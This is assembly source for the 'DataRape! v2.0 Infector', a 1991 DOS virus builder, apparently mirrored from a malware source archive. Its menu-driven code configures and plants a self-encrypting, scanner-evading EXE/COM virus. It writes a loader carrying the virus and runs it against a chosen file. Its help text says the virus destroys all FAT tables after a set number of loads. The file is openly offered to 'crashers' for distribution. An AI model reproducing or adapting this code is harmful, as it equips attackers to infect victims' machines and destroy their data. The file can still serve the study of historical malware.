mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
595 lines
19 KiB
NASM
595 lines
19 KiB
NASM
; DataRape! v2.0 Infector
|
||
;
|
||
; I know you won't dist this, DD. Sorry its a bit sloppy, but it works.
|
||
;
|
||
; - Zodiac (06/26/91)
|
||
|
||
|
||
print macro
|
||
call prints
|
||
endm
|
||
|
||
cls macro
|
||
call clrscr
|
||
endm
|
||
|
||
code segment
|
||
assume cs:code, ds:code
|
||
org 100h
|
||
|
||
start: jmp main_menu
|
||
|
||
include loader.inc
|
||
|
||
main_menu_str db "DataRape! v2.0 Infector",13,10
|
||
db "(c)1991 Zodiac of RABID",13,10
|
||
db 13,10
|
||
db "A. Information/Help",13,10
|
||
db "B. Configure Virus",13,10
|
||
db "C. View Scrolling",13,10
|
||
db "D. Infect File",13,10
|
||
db "E. Exit to Dos",13,10
|
||
db 13,10
|
||
db "Command: $"
|
||
|
||
help_scr db " DataRape! v2.0 Information/Help",13,10
|
||
db 13,10
|
||
db "DataRape! v2.0 is a mutating self-encrypting destructive stealth",13,10
|
||
db "EXE/COM infector. It infects files upon execution, browsing,",13,10
|
||
db "copying, and renaming. The encryption method changes randomly as",13,10
|
||
db "does the encryption header. The virus should not be picked-up by",13,10
|
||
db "conventional string scanners(ie SCAN). If so, it will be changed.",13,10
|
||
db "After a specified number of successful loads to memory, the virus",13,10
|
||
db "turns destructive and destroys all available FAT tables. It then",13,10
|
||
db "proceeds to display a configurable scrolling message in",13,10
|
||
db "configurable colors.",13,10
|
||
db 13,10
|
||
db "This infection program is self-explanatory, and is intended for",13,10
|
||
db "general distribution to RABID's selected crashers. This virus has",13,10
|
||
db "taken many, many hours away from my life. But, it was a pleasure",13,10
|
||
db "programming and a new version will be released(shortly?).",13,10
|
||
db 13,10
|
||
db "Good Luck! Try not to get busted( trust me, it stinks. ).",13,10
|
||
db 13,10
|
||
db '"Fear the Government that Fears Your Computer!"',13,10
|
||
db 13,10
|
||
db " -- Zodiac of RABID, USA",13,10
|
||
db 13,10
|
||
db "P.S. I wrote this infector in assembly, can't you tell?$",13,10
|
||
|
||
config_scr db "DataRape! v2.0 Configuration",13,10
|
||
db 13,10
|
||
db "Loads before Destruction(20 recommended) : "
|
||
db "$"
|
||
config_2 db 13,10
|
||
db 13,10
|
||
db "Note: Press spacebar a few times at beginning or end of message.",13,10
|
||
db 13,10
|
||
db "Enter Scrolling Message: $"
|
||
config_3 db 'Enter Colors in form: "bf", where "b" is the background and "f" the foreground.',13,10
|
||
db ' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ',13,10
|
||
db 'Colors: <20> FOREGROUND ONLY <20>',13,10
|
||
db ' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>',13,10
|
||
db '0 : black 4 : red <20><> <20> 8 : light grey C : light red',13,10
|
||
db '1 : blue 5 : magenta <20><>Ĵ 9 : light blue D : light magenta'
|
||
db '2 : green 6 : brown <20><>Ĵ A : light greenta E : yellow',13,10
|
||
db '3 : cyan 7 : white <20> B : light cyan F : bright white',13,10
|
||
db ' <20><><EFBFBD><EFBFBD><EFBFBD>',13,10
|
||
db 13,10
|
||
db 'Background Color : $'
|
||
config_4 db 13,10
|
||
db 'Border Color : $'
|
||
config_5 db 13,10
|
||
db 'Scroll Color : $'
|
||
|
||
color_s db "bf",8,8,"$"
|
||
|
||
infect_1 db "DataRape! v2.0 Infection",13,10
|
||
db 13,10
|
||
db "Finally...",13,10
|
||
db 13,10
|
||
db "It would be a good idea to View Scrolling before you infect a file",13,10
|
||
db "to make sure you set up the colors right and the message is OK.",13,10
|
||
db 13,10
|
||
db "Who else but RABID would allow configurable colors? ",13,10
|
||
db 13,10
|
||
db "File to Infect : $"
|
||
|
||
infect_2 db 13,10
|
||
db 13,10
|
||
db "An attempt will be made to infect the selected file.",13,10
|
||
db "If the file does not exist, or does not qualify for",13,10
|
||
db "infection, it will not be. It is up to you to find",13,10
|
||
db "out whether it worked or not. Remember, only COM and",13,10
|
||
db "EXE files that are over 1885 bytes are infected.$"
|
||
|
||
infect_3 db 13,10
|
||
db 13,10
|
||
db "File Infection Successful. RABID - Keeping the Dream Alive!$"
|
||
|
||
infect_4 db 13,10
|
||
db 13,10
|
||
db "File Infection Unsuccessful!$"
|
||
|
||
infect_5 db 13,10
|
||
db 13,10
|
||
db "File Not Found$"
|
||
|
||
clrscr: mov ax,0003
|
||
int 10h
|
||
ret
|
||
|
||
prints: mov ah,9
|
||
int 21h
|
||
ret
|
||
|
||
get_key: mov ah,8
|
||
int 21h
|
||
ret
|
||
|
||
get_up_key: call get_key
|
||
cmp al,"a"
|
||
jb got_up
|
||
cmp al,"z"
|
||
ja got_up
|
||
sub al,"a"-"A"
|
||
got_up: ret
|
||
|
||
get_num: call get_key
|
||
cmp al,27
|
||
je got_num
|
||
cmp al,"0"
|
||
jb get_num
|
||
cmp al,"9"
|
||
ja get_num
|
||
got_num: ret
|
||
|
||
nl: mov ah,0Eh
|
||
mov al,13
|
||
int 10h
|
||
mov al,10
|
||
int 10h
|
||
ret
|
||
|
||
main_menu: cls
|
||
|
||
mov dx,offset main_menu_str
|
||
print
|
||
|
||
main_key: call get_up_key
|
||
|
||
cmp al,"A"
|
||
je info_help
|
||
|
||
cmp al,"B"
|
||
je config
|
||
cmp al,"C"
|
||
jne is_it_d
|
||
jmp view_scroll
|
||
is_it_d: cmp al,"D"
|
||
jne isitexit
|
||
jmp infectfile
|
||
isitexit: cmp al,"E"
|
||
je exit
|
||
cmp al,27
|
||
je exit
|
||
|
||
jmp main_key
|
||
|
||
exit: jmp done
|
||
|
||
info_help: cls
|
||
mov dx,offset help_scr
|
||
print
|
||
call get_key
|
||
|
||
info_done: jmp main_menu
|
||
|
||
config: cls
|
||
mov dx,offset config_scr
|
||
print
|
||
mov cx,2
|
||
get_freq: call get_num
|
||
cmp al,27
|
||
je info_done
|
||
mov ah,0Eh
|
||
int 10h
|
||
sub al,"0"
|
||
push ax
|
||
loop get_freq
|
||
pop bx
|
||
pop ax
|
||
mov cl,10
|
||
mul cl
|
||
add al,bl
|
||
cmp al,2
|
||
jb info_done
|
||
mov countr,al
|
||
|
||
mov di,offset msg
|
||
mov al,0
|
||
mov cx,216
|
||
rep stosb
|
||
mov ah,9
|
||
mov dx,offset config_2
|
||
int 21h
|
||
xor bx,bx
|
||
mov ax,0AFAh
|
||
mov cx,215
|
||
int 10h
|
||
mov ah,2
|
||
mov dx,0619h
|
||
int 10h
|
||
mov si,offset msg
|
||
mov di,si
|
||
mov bp,0
|
||
get_char_loop:call get_key
|
||
cmp al,27
|
||
je done_config
|
||
cmp al,13
|
||
je done_get
|
||
cmp al,08
|
||
jne no_back
|
||
cmp bp,0
|
||
je get_char_loop
|
||
mov ah,3
|
||
int 10h ; GETS INFO
|
||
dec bp
|
||
dec di
|
||
cmp dl,0
|
||
jne no_new_line
|
||
dec dh
|
||
mov dl,80
|
||
no_new_line: dec dl
|
||
mov ah,2
|
||
int 10h
|
||
mov ah,0Ah
|
||
mov al,250
|
||
mov cx,1
|
||
int 10h
|
||
jmp get_char_loop
|
||
no_bacK: stosb
|
||
inc bp
|
||
mov ah,0Eh
|
||
int 10h
|
||
cmp bp,215
|
||
je done_get
|
||
jmp get_char_loop
|
||
|
||
done_get: mov al,0
|
||
stosb
|
||
mov ah,2
|
||
mov dx,0A00h
|
||
int 10h
|
||
mov dx,offset config_3
|
||
print
|
||
mov si,offset back_round + 1
|
||
call get_clr
|
||
mov dx,offset config_4
|
||
print
|
||
mov si,offset bord_clr + 1
|
||
call get_clr
|
||
mov dx,offset config_5
|
||
print
|
||
mov si,offset scroll_clr + 1
|
||
call get_clr
|
||
|
||
|
||
done_config: jmp main_menu
|
||
pop_done: pop ax
|
||
jmp main_menu
|
||
get_clr: mov dx,offset color_s
|
||
print
|
||
get_color: call get_key
|
||
cmp al,27
|
||
je done_config
|
||
cmp al,"0"
|
||
jb get_color
|
||
cmp al,"7"
|
||
ja get_color
|
||
mov ah,0Eh
|
||
int 10h
|
||
sub al,"0"
|
||
push ax
|
||
get_color_2: call get_up_key
|
||
cmp al,27
|
||
je pop_done
|
||
cmp al,"0"
|
||
jb get_color_2
|
||
cmp al,"9"
|
||
ja maybe_char
|
||
mov ah,0Eh
|
||
int 10h
|
||
sub al,"0"
|
||
jmp short ok_clr_2
|
||
maybe_char: cmp al,"A"
|
||
jb get_color_2
|
||
cmp al,"F"
|
||
ja get_color_2
|
||
mov ah,0Eh
|
||
int 10h
|
||
sub al,"A"-10
|
||
ok_clr_2: pop cx
|
||
push ax
|
||
xor ax,ax
|
||
mov al,cl
|
||
mov cl,4
|
||
shl al,cl
|
||
pop cx
|
||
add al,cl
|
||
mov [si],al
|
||
ret
|
||
|
||
view_scroll:
|
||
|
||
;************************
|
||
|
||
nuke: call rel
|
||
rel: pop di
|
||
sub di,offset rel - offset nuke
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov ax,1
|
||
int 10h ; 40 * 40 COLOR
|
||
|
||
mov ah,1
|
||
mov cx,2020h
|
||
int 10h ; NULS CURSOR
|
||
|
||
mov ax,0600h
|
||
xor cx,cx
|
||
mov dx,184Fh
|
||
back_round: mov bh,12
|
||
int 10h ; CLEARS BACKGROUND WINDOW
|
||
|
||
mov cx,0900h
|
||
mov dx,094Fh
|
||
scroll_clr: mov bh,4Fh
|
||
int 10h ; CLEARS MESSAGE WINDOW
|
||
|
||
xor bx,bx
|
||
mov dx,0800h
|
||
mov ah,2
|
||
int 10h
|
||
|
||
bord_clr: mov bx,02h ; clr
|
||
mov cx,40
|
||
mov ax,09C4h
|
||
push ax
|
||
push bx
|
||
push cx
|
||
int 10h
|
||
|
||
mov dx,0A00h
|
||
mov ah,2
|
||
int 10h
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
int 10h
|
||
|
||
mov dx,030Ch
|
||
mov si,di
|
||
add si,offset header-offset nuke
|
||
mov cx,4
|
||
head_print: mov ah,2
|
||
int 10h
|
||
xy_loop: lodsb
|
||
mov ah,0Eh
|
||
int 10h
|
||
cmp al,0
|
||
jne xy_loop
|
||
inc dh
|
||
loop head_print
|
||
|
||
|
||
mov bp,39
|
||
scroll: mov dx,0900h
|
||
call xy
|
||
cmp bp,1
|
||
jb no_pad
|
||
|
||
mov cx,bp
|
||
mov ax,0A20h
|
||
int 10h
|
||
add dx,cx
|
||
call xy
|
||
|
||
mov cx,40
|
||
sub cx,bp
|
||
dec bp
|
||
mov si,offset msg-offset nuke
|
||
add si,di
|
||
|
||
jmp short sprint
|
||
no_pad: mov cx,40
|
||
inc si
|
||
cmp byte ptr [si],0
|
||
jne sprint
|
||
mov si,offset msg-offset nuke
|
||
add si,di
|
||
sprint: push si
|
||
call prnt
|
||
pop si
|
||
jmp short scroll
|
||
|
||
prnt:
|
||
lodsb
|
||
cmp al,0
|
||
jne pchar
|
||
mov si,offset msg-offset nuke
|
||
add si,di
|
||
jmp short prnt
|
||
|
||
pchar: mov ah,0Eh
|
||
int 10h
|
||
mov ah,1
|
||
int 16h
|
||
jc go_main_menu
|
||
loop prnt
|
||
mov cx,6
|
||
main_pause: push cx
|
||
mov cx,0FFFFh
|
||
pause: loop pause
|
||
pop cx
|
||
loop main_pause
|
||
done_pause: ret
|
||
|
||
go_main_menu: pop ax
|
||
jmp main_menu
|
||
|
||
|
||
xy: mov ah,2
|
||
int 10h
|
||
ret
|
||
header db "DataRape! v2.0",0
|
||
db "-CONFIGURABLE-",0
|
||
db "(c)1991 Zodiac",0
|
||
db " RABID, USA ",0
|
||
|
||
go_ret_infect:jmp main_menu
|
||
|
||
infectfile: cls
|
||
mov dx,offset infect_1
|
||
print
|
||
mov ah,0Ah
|
||
mov dx,offset file_in
|
||
int 21h
|
||
cmp chars,4
|
||
jb go_ret_infect
|
||
mov cx,61
|
||
mov di,offset file_name
|
||
mov al,13
|
||
repne scasb
|
||
mov byte ptr [di-1],0
|
||
|
||
mov ah,4Eh
|
||
mov cx,0
|
||
mov dx,offset file_name
|
||
int 21h
|
||
jnc file_found
|
||
jmp bad_file
|
||
|
||
file_found:
|
||
|
||
mov ah,41h
|
||
mov dx,offset loader
|
||
int 21h
|
||
|
||
|
||
; prepare loader
|
||
mov si,offset file_name
|
||
xor cx,cx
|
||
mov cl,chars
|
||
mov di,offset datarape+56
|
||
rep movsb
|
||
|
||
mov si,offset msg
|
||
mov di,offset dr_msg
|
||
mov cx,215
|
||
rep movsb
|
||
|
||
mov ah,byte ptr [back_round+1]
|
||
mov al,byte ptr [scroll_clr+1]
|
||
mov bl,byte ptr [bord_clr+1]
|
||
|
||
mov backclr,ah
|
||
mov scrclr,al
|
||
mov bordclr,bl
|
||
|
||
mov ah,3Ch
|
||
mov cx,0
|
||
mov dx,offset loader
|
||
int 21h ; creates it
|
||
jc go_ret_infect
|
||
|
||
mov bx,ax
|
||
mov ah,40h
|
||
mov cx,loadsize
|
||
mov dx,offset datarape
|
||
int 21h ; writes it
|
||
|
||
mov ah,3Eh
|
||
int 21h ; closes it
|
||
|
||
call kill_cntr
|
||
|
||
mov bx,(code_done-start+110h)/16
|
||
mov ah,4Ah
|
||
int 21h
|
||
|
||
mov dx,offset loader
|
||
mov bx,offset loader
|
||
mov ax,4B00h
|
||
int 21h ; exec file
|
||
|
||
call kill_cntr
|
||
|
||
mov ah,41h
|
||
mov dx,offset loader
|
||
int 21h ; kills loader
|
||
|
||
|
||
mov ax,3D00h
|
||
mov dx,offset file_name
|
||
int 21h
|
||
|
||
mov bx,ax
|
||
|
||
mov ax,5700h
|
||
int 21h
|
||
|
||
mov ah,3Eh
|
||
int 21h
|
||
|
||
and cx,1Fh
|
||
cmp cx,1Fh
|
||
jne bad_infect
|
||
|
||
mov dx,offset infect_3
|
||
print
|
||
jmp short get_char
|
||
|
||
bad_infect: mov dx,offset infect_4
|
||
print
|
||
jmp short get_char
|
||
|
||
bad_file: mov dx,offset infect_5
|
||
print
|
||
get_char: call get_key
|
||
|
||
ret_infect: jmp main_menu
|
||
kill_cntr: mov ah,19h
|
||
int 21h
|
||
add al,"A"
|
||
mov byte ptr [offset nasty],al
|
||
|
||
mov dx,offset nasty
|
||
mov ax,4301h
|
||
xor cx,cx
|
||
int 21h ; NULS ATTRIBUTES
|
||
|
||
|
||
mov ah,41h
|
||
int 21h ; Deletes Counter File
|
||
ret
|
||
|
||
|
||
done: cls
|
||
int 20h
|
||
|
||
nasty db "A:\",0FFh,0FFh,0FFh,".",0FFh,0FFh,0
|
||
badfile db "Bad File...$"
|
||
loader db "LOADER.COM",0
|
||
file_in db 60
|
||
chars db 0
|
||
file_name db 60 dup(0)
|
||
msg db "RABID, INTERNATIONAL - Keeping the Dream Alive. (YOUR NAME HERE!)"
|
||
|
||
code_done equ $
|
||
code ends
|
||
end start
|
||
|